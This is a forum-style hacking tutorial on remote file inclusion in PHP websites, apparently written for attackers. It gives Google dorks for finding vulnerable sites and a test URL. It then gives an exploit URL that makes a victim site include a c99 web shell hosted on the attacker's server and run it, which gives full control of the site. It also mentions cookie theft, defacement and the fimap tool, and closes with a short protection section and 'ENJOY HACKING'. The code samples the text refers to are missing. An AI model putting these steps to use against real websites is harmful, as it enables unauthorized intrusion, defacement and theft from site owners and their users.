REMOTE FILE INCLUSION (RFI)

Remote file inclusion (RFI) is a very common vulnerability found in most of the websites. Remote file inclusion allows the attacker to upload a script or malicious code in a website or server. Using this attack, we can exploit"dynamic file include" mechanisms in web applications. when web applications take user input(such as url, parameter values etc) and pass them into file include commands, the website can be tricked into including remote files with malicious code.using RFI you can deface the vulnerable websites, get access to the server or even you can manipulate of the response sent to the client of the website. For example you can embed a JavaScript code to steal the client cookie session.

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming. The vulnerability mainly relies on the PHP include () function. So you need to know some basic php concepts for better understanding of this attack. A include() function is used to include or evaluate a specified file. Actually the php code responsible for this vulnerability will be in a format similar as stated below:

Thus If this isn't coded properly, the script doesn't check where the file is coming from and so an inclusion from another site will be accepted and run on the server. This means that a text file containing PHP script can be hosted on another site but run on the site being targeted.

Performing a RFI attack

1. First step is to find the vulnerable website

Remote File inclusion vulnerability usually occur in those sites which have a navigation similar to this:

www.victimwebsite.com/index.php?page=something

To find a vulnerable website, we will use Google dorks :

Go to google, and type the following:

Inurl:index.php?file=something

Or

Inurl:index.php?page=something

Or

Inurl:index.php?open=something

There are many more dorks for finding RFI vulnerable websites.

At the end you will find numerous websites similar to the address stated above. But remember, these are sites which may be prone to RFI attack. We have to check further that whether they are vulnerable or not.

So go to a particular website in which you want to test RFI attack . for example if your website’s url is: www.victimwebsite.com/index.php?file=anything

Replace the red colour text with http://google.com, so that the url of the target website would be same as: www.victimwebsite.com/index.php?file=http://google.com

Now as soon as you press enter,if google homepage is there in the website, it means the website is vulnerable to RFI attack.

EXPLOITING RFI VULNERABILITY

2. Now lets look how we can exploit RFI vulnerability .

This is where the concept of web shells come in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands. The most common shell being the c99 but others are available such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site - and will be able to upload or delete any file you wish.

We will use c99 webshell to deploy our attack, you can download the c99 webshell from the link below:

C99 download link

Now you need to upload this webshell as a text file in your own website(attacker’s website) or in any webhost. After uploading if your url would be: www.mysite.com/c99.txt, then all you do is to simply put this link at the end of your vulnerable site. Thus the final string that will run the webshell is:

http://www.victimwebsite.com/index.php?file=http://www.mysite.com/c99.txt?

Note: the question mark should be at the end.

This will execute in the php as
include('http://www.site.com/c99.txt'); which includes the web shells script in the page.

Now if you succeds to run the web shell in vulnerable website, you will see a screen similar as below:

The shell will display information about the remote server and list all the files and directories on it. Now you are inside the website and you can do anything with it.

PROTECTION AGAINST RFI

If you still want to use index.php?file=, then use “switch” statement that defines the page before hand. A secure php code would be as below:

Or the best way is simply make sure that you are using up-to-date scripts, and make sure your server php.ini file has register_globals and allow_url_fopen disabled.

I personally don’t prefer any tool for penetration testing, but if you want to use a tool for RFI attack then,A tool called FIMAP is used to exploit Remote file inclusion. This is scripted in python language.

Read more:

http://code.google.com/p/fimap/

download the tool:

http://code.google.com/p/fimap/downloads/list

Sources: security papers from: www.exploit-db.com

http://en.wikipedia.org/wiki/Remote_file_inclusion

www.corelan.be

image source: www.hackforums.net

Well, that’s the end of the tutorial. Hope you have learnt something from this post. Your feedback will be useful for us.

!!!!ENJOY HACKING!!!

Posted by: DR34MHAXX